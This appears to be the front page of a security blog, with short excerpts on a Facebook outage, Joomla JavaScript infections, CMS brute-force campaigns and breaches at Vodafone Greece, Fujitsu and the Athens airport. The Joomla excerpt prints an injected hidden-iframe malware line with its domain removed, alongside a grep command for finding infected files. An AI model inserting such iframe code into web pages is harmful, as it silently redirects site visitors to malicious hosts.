Facebook is down!! — UPDATED

That’s new, Facebook DNS gone crazy?
Facebook is down all over the world, this must be their worst outage in their history from what seems to be a DNS error.
It should only take a while to have it up again but that’s a major failure not expected from the so far stable service of Facebook.
Live stream from all over the world mention losing access on the last 10 minutes when many people had problems with images and …

Continue Reading →

New joomla infections (?) mustmoneyback.cgi

Today looking at some systems I notice a new pattern on some .js files. Multiple files were infected with the following code:
;document.write(‘<iframe src=”hxxp://″ align=”center” height=”5″ width=”5″></iframe>’);
;document.write(‘<iframe src=”hxxp://″ align=”center” height=”5″ width=”5″></iframe>’);
and other domains were found also with the same .cgi file calls. An easy way to look for infections on PLESK systems is the following:
find /var/www/vhosts/ -type f -name ‘*.js’ -print0 | xargs -0 egrep -iw “(km0ae9gr6m|mustmoneyback)”
After locating the infections one can clean up the files …

Continue Reading →

WordPress/joomla CMS brute force attacks (more than 25k sites)

It came to our notice today a targeted bruteforce attack on worpress/joomla/drupal and other CMS based websites. The list of the attacked hosts contains more than 25000 websites ( and considering that it’s starting from the letter m and below this appears to be just a part of a larger document.
The attack is being initiated through compromised windows systems where the following files are being uploaded:
30/03/2012  08:57 πµ           624.640 ctfmon.exe
25/09/2012  03:13 µµ                 0 good.txt
21/07/2012  12:50 µµ                 …

Continue Reading →

Vodafone Greece hacked…

Με το ποσό των 690 χιλιάδων ευρώ ζημιώθηκε η Vodafone από τη μη καταγραφή χρήσης mobile internet που πραγματοποιήθηκε μέσω του δικτύου της. Το γεγονός έγινε γνωστό από τη Δίωξη Ηλεκτρονικού Εγκλήματος ως εξής: Με προηγμένη μέθοδο ηλεκτρονικής διείσδυσης, τύπου cracking, στα υπολογιστικά συστήματα της εταιρείας, οι εμπλεκόμενοι αποκτούσαν πρόσβαση στα δεδομένα διαχείρισης και πωλούσαν παράνομα στην Κούβα συνδέσεις στο διαδίκτυο. Ειδικότερα, οι τρεις δράστες κατάφεραν να διεισδύσουν ηλεκτρο- …

Continue Reading →

Fujitsu hacked by Anonymous..

As reported on, Fujitsu general DB’s leaked last week.
The method used was SQL Injection on which seems to have been corrected at this point but this is once again an example on how vulnerable our personal information is and how cautious we must be as far as posting our personal details is even in big and trustful sites.
Let us not forget what happened last year with Sony, even if Fujitsu has much less information on …

Continue Reading →

Greece International Airport (AIA / El. Venizelos) hacked!!

Last night Iranian hackers compromised AIA’s page, demonstrating once again how loosen the security is in major Greek sites.
As said in the past, in Greece organisations and government are paying a lot of money for simple web site development and promotion but are not considering the security at all.
Up to this minute remains hacked (and will probably remain until tomorrow), has informed the Airport security for this hack but as usual we are not expecting any …

Continue Reading →
Page 1 of 19 12345...»